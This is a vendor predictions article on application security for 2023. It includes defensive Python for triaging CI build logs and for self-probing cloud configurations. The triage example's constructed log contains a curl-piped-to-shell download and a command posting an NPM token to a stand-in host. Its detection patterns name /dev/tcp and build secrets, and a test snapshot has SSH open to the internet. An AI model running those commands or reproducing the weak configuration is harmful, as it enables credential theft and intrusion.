Virtualization Technology News and Information
Enso Security 2023 Predictions: A New Security Paradigm for Application Security


Industry executives and experts share their predictions for 2023.  Read them in this 15th annual series exclusive.

A New Security Paradigm for Application Security

By Omer Yaron, Head of Research at Enso Security

Between attackers gaining speed and sophistication, and developers growing in number while constantly accelerating their delivery flow, application security teams are inundated with noise, conflicting priorities and growing risk. Even with the considerable impact the 'shift-left' movement has had on security, and with newer, more agile tooling built to make the AppSec process more efficient and streamlined, we at Enso Security, the industry's first Application Security Posture Management (ASPM) solution, believe that 2023 will demand a paradigm shift if AppSec professionals want to be proactive security leaders.

Supply chain attacks on code

Supply chain attacks are not new, but they are growing in volume and taking on new and concerning vectors as they spread to new attack surfaces. We are seeing these breaches evolve to target public package repositories and to compromise open source maintainers, as open source software and the supply chains built on it become highly attractive targets for malicious actors. Malicious code that may execute in CI, in production, or on developers' workstations will require AppSec professionals to strengthen their incident response capabilities. As these attacks escalate, organizations will need to be able to retrieve, verify and assess their CI build logs in order to quickly determine whether malicious code ran, and to understand which related assets (the build host, the credentials the job could read, the artifacts it produced) may have been compromised. Without scaling these abilities, AppSec teams will find it difficult to anticipate and react to breaches of third-party packages.
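As an added example (not Enso Security's code, and not a tool the article describes), the following script shows the kind of build-log triage the paragraph calls for: it walks an npm-style CI log, flags versions that an advisory feed has marked as compromised, records every lifecycle script that executed, and flags shell behaviour inside such a script that an install step has no reason to show. The log, the package names and the "compromised" versions are all constructed for the example.

```python
"""Triage a CI build log for signs that a compromised dependency ran.

Added example, not code from Enso Security. The sample log, the package names
and the "compromised" versions are constructed for illustration; in practice
triage() is fed the real build log and an advisory feed (your SCA tool's
malicious-package list) instead of the COMPROMISED set below.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed advisory data: (package, version) pairs flagged as malicious.
COMPROMISED = {("left-padder", "1.3.1"), ("@acme/color-utils", "4.0.5")}

# "name@1.2.3" tokens, including scoped names such as "@acme/color-utils@4.0.5".
PKG_TOKEN = re.compile(r"(?<![\w@/])(@?[\w-]+(?:/[\w.-]+)?)@(\d+\.\d+\.\d+(?:[-+][\w.]+)?)")
# npm-style lifecycle banner "> <pkg>@<ver> <phase> <dir>": the first point at
# which a dependency's own code executes on the build host.
LIFECYCLE = re.compile(r"^> (@?[\w./-]+)@(\S+) (preinstall|install|postinstall|prepare)\b")
# Lines that mean the package manager is back in control (script output ended).
SCRIPT_END = re.compile(r"^(npm\b|added \d|audited \d|found \d)")
TIMESTAMP = re.compile(r"^\[[^\]]*\]\s*")  # CI runners usually prefix a timestamp
# Behaviour a build-time install script has no legitimate reason to show.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)\b"), "base64 decoding at install time"),
    (re.compile(r"/dev/tcp/"), "raw TCP connection from a shell"),
    (re.compile(r"\b(AWS_SECRET_ACCESS_KEY|NPM_TOKEN|GITHUB_TOKEN)\b"), "build secret referenced"),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    severity: str            # "high": block the build and open an incident; "medium": review
    reason: str
    package: Optional[str]   # name@version whose script produced the evidence


def triage(log_text: str) -> list:
    findings = []
    active = None  # (name, version) of the lifecycle script currently producing output
    for no, raw in enumerate(log_text.splitlines(), 1):
        line = TIMESTAMP.sub("", raw).rstrip()
        if SCRIPT_END.match(line):
            active = None
        banner = LIFECYCLE.match(line)
        if banner:
            active = (banner.group(1), banner.group(2))
            bad = active in COMPROMISED
            findings.append(Finding(no, "high" if bad else "medium",
                                    banner.group(3) + " script ran"
                                    + (" for a package flagged as compromised" if bad else ""),
                                    "@".join(active)))
            continue
        for name, ver in PKG_TOKEN.findall(line):
            if (name, ver) in COMPROMISED:
                findings.append(Finding(no, "high", "compromised version installed", f"{name}@{ver}"))
        if active:
            for pattern, why in SUSPICIOUS:
                if pattern.search(line):
                    findings.append(Finding(no, "high", why + " inside a lifecycle script", "@".join(active)))
    return findings


def must_block(findings) -> bool:
    """One high finding means: stop the pipeline and rotate every secret the job could see."""
    return any(f.severity == "high" for f in findings)


def affected_packages(findings) -> set:
    return {f.package for f in findings if f.severity == "high" and f.package}


# Constructed log in the shape of an npm install inside a CI job (not a real build).
SAMPLE_LOG = """\
[10:42:01] npm WARN deprecated request@2.88.2: request has been deprecated
[10:42:03] > esbuild@0.17.19 postinstall /workspace/node_modules/esbuild
[10:42:03] > node install.js
[10:42:05] > left-padder@1.3.1 postinstall /workspace/node_modules/left-padder
[10:42:05] > node setup.js
[10:42:05] + curl -s https://cdn.example.invalid/i.sh | sh
[10:42:06] + printenv NPM_TOKEN | curl -s -X POST --data-binary @- https://cdn.example.invalid/c
[10:42:07] added 412 packages, and audited 413 packages in 6s
[10:42:07] found 0 vulnerabilities
"""

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"line {f.line_no:2} {f.severity:6} {f.package}: {f.reason}")
    print("block build:", must_block(found), "| affected:", sorted(affected_packages(found)))
```

Two caveats a practitioner would attach. The log is attacker-influenced data: a malicious postinstall script controls its own output, so the absence of an indicator proves nothing, while a lifecycle script running for a flagged version is by itself enough to treat the runner, and every secret the job could read, as compromised. And logs only help if they are retained and tamper-evident; ship them off the runner as the build proceeds rather than collecting them afterwards.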

Automated malicious probers on the loose

The use of automated malicious probers to exploit cloud misconfigurations is a trend we recognized in 2021, and one that will remain relevant in the year(s) to come. As cloud computing keeps scaling and becomes the default environment for businesses of all sizes, attackers will exploit the inescapable reality that misconfigurations are harder to detect in the cloud, and will use automation to scan the big cloud providers' address space for easily exploitable misconfigurations, at scale. While cloud environments improve efficiency, productivity and business processes across the board, they require entirely different security strategies than traditional on-prem environments do. Application security leaders will need to invest in self-probing tools and cloud security tooling so that they, and not attackers, are the first to detect any misconfiguration.
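As an added example (not Enso Security's code, and not any particular product's check), here is a small self-probe of the kind the paragraph describes, run over a constructed snapshot of cloud configuration rather than a live account: it reports security-group rules that admit the whole internet to admin or database ports, and bucket policies that grant anonymous read, and it evaluates the weak snapshot beside a corrected one. The account ID, bucket name and CIDRs are invented.

```python
"""Self-probe a cloud snapshot for what automated scanners find first: admin and
database ports open to the world, and publicly readable buckets.

Added example, not Enso Security code. The two snapshots below are constructed in
the shape of AWS security-group rules and S3 bucket policies (one weak, one
corrected); account, bucket and CIDR values are invented and no cloud API is called.
"""
import ipaddress

# Ports automated probers try first once an address answers from the internet.
SENSITIVE_PORTS = {22: "ssh", 3389: "rdp", 3306: "mysql", 5432: "postgresql",
                   6379: "redis", 9200: "elasticsearch", 27017: "mongodb"}

def is_world(cidr: str) -> bool:
    """True for a CIDR that admits every address of its family (0.0.0.0/0, ::/0)."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0

def exposed_ports(group: dict) -> list:
    """Sensitive ports this security group accepts from the whole internet."""
    hits = []
    for rule in group.get("IpPermissions", []):
        cidrs = ([r["CidrIp"] for r in rule.get("IpRanges", [])]
                 + [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])])
        world = [c for c in cidrs if is_world(c)]
        if not world:
            continue
        proto = rule.get("IpProtocol")
        if proto == "-1":                 # "all traffic": every port of every protocol
            lo, hi = 0, 65535
        elif proto in ("tcp", "udp"):
            lo, hi = rule.get("FromPort", 0), rule.get("ToPort", 65535)
        else:                             # icmp and friends carry no port
            continue
        hits += [{"group": group["GroupId"], "port": p, "service": s, "cidr": world}
                 for p, s in SENSITIVE_PORTS.items() if lo <= p <= hi]
    return hits

def _anonymous(principal) -> bool:
    """Principal "*" or {"AWS": "*"} grants to anyone, authenticated or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False

def public_statements(policy: dict) -> dict:
    """Sid -> "public" (anonymous read, no Condition) or "review" (anonymous but conditioned)."""
    verdicts = {}
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or not _anonymous(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if not any(a in ("*", "s3:*") or a.lower().startswith(("s3:get", "s3:list")) for a in actions):
            continue
        # A Condition (aws:SourceVpce, aws:SourceIp, ...) may or may not close the
        # hole; hand it to a human instead of silently passing it.
        verdicts[st.get("Sid", "<no Sid>")] = "review" if st.get("Condition") else "public"
    return verdicts

def probe(config: dict) -> dict:
    """Both checks over one snapshot {"security_groups": [...], "bucket_policies": {name: policy}}."""
    buckets = {b: public_statements(p) for b, p in config["bucket_policies"].items()}
    return {"exposed_ports": [h for g in config["security_groups"] for h in exposed_ports(g)],
            "public_buckets": {b: v for b, v in buckets.items() if v}}

def is_clean(report: dict) -> bool:
    """No world-exposed port and no unconditioned public grant ("review" items do not block)."""
    return not report["exposed_ports"] and "public" not in {
        v for sids in report["public_buckets"].values() for v in sids.values()}

def _sg(group_id: str, rules) -> dict:
    """Build a security group from (port, ipv4_cidrs, ipv6_cidrs) tuples (test-data helper)."""
    return {"GroupId": group_id, "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": p, "ToPort": p, "IpRanges": [{"CidrIp": c} for c in v4],
         "Ipv6Ranges": [{"CidrIpv6": c} for c in v6]} for p, v4, v6 in rules]}

# Constructed: the weak snapshot a prober would find within minutes. 443 is the only
# port meant to be public; SSH and Redis are not.
WEAK = {
    "security_groups": [_sg("sg-weak", [(22, ["0.0.0.0/0"], []), (443, ["0.0.0.0/0"], []),
                                        (6379, [], ["::/0"])])],
    "bucket_policies": {"build-artifacts": {"Version": "2012-10-17", "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::build-artifacts/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "arn:aws:s3:::build-artifacts/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0example"}}}]}},
}
# Constructed: the corrected snapshot. SSH only from a bastion range, Redis only from
# the VPC, and the bucket readable by a single CI role.
FIXED = {
    "security_groups": [_sg("sg-fixed", [(22, ["203.0.113.0/24"], []), (443, ["0.0.0.0/0"], []),
                                         (6379, ["10.0.0.0/8"], [])])],
    "bucket_policies": {"build-artifacts": {"Version": "2012-10-17", "Statement": [
        {"Sid": "CIOnly", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/ci-runner"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::build-artifacts/*"}]}},
}
```

The design point is that the probe runs on exported configuration, so it can be scheduled on every change to the account without any network scanning, and the defender evaluates the configuration while the attacker only sees the ports; whoever looks first wins. A Condition on an anonymous statement is reported for review rather than passed, since an aws:SourceIp or aws:SourceVpce condition can easily be broad enough to leave the bucket effectively public.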

Managing posture, not issues

AppSec teams have been locked in a dizzying cat-and-mouse game with attackers. As malicious actors grow in sophistication, they directly shape how AppSec professionals assess and prioritize their budgets, timelines and strategic processes. AppSec teams have been forced to chase defects and developers, racing to keep up with both the scale of attacks and the pace of development. Today, and increasingly going forward, AppSec programs are turning to holistic management of all resources, processes and teams, rather than continuing to lose a game they were never equipped for. Application Security Posture Management (ASPM) is a significant paradigm shift: it lets teams manage an application's resources in a risk-based manner, correlated with the organization's critical assets, so that a finding's priority reflects what it can actually affect. For developers, this shift is a welcome respite from what they may see as excessive security interference: they can keep scaling their productivity while tracking the most critical tasks required to improve the organization's overall security posture.

In 2023, application security will complete its evolution from a cybersecurity niche to a full-fledged business, development and security priority for organizations of all sizes. Getting there requires a paradigm shift, one that allows AppSec to become more focused and effective and empowers teams to run a marathon, not a sprint, while matching developers in their agility and business-forward approach.



Omer Yaron 

Omer Yaron is the Head of Research at Enso Security. Prior to joining Enso, he was the Cyber Security Team Lead at and did incident response & digital forensics for the Israel National Cyber Directorate. 

Published Friday, November 18, 2022 7:31 AM by David Marshall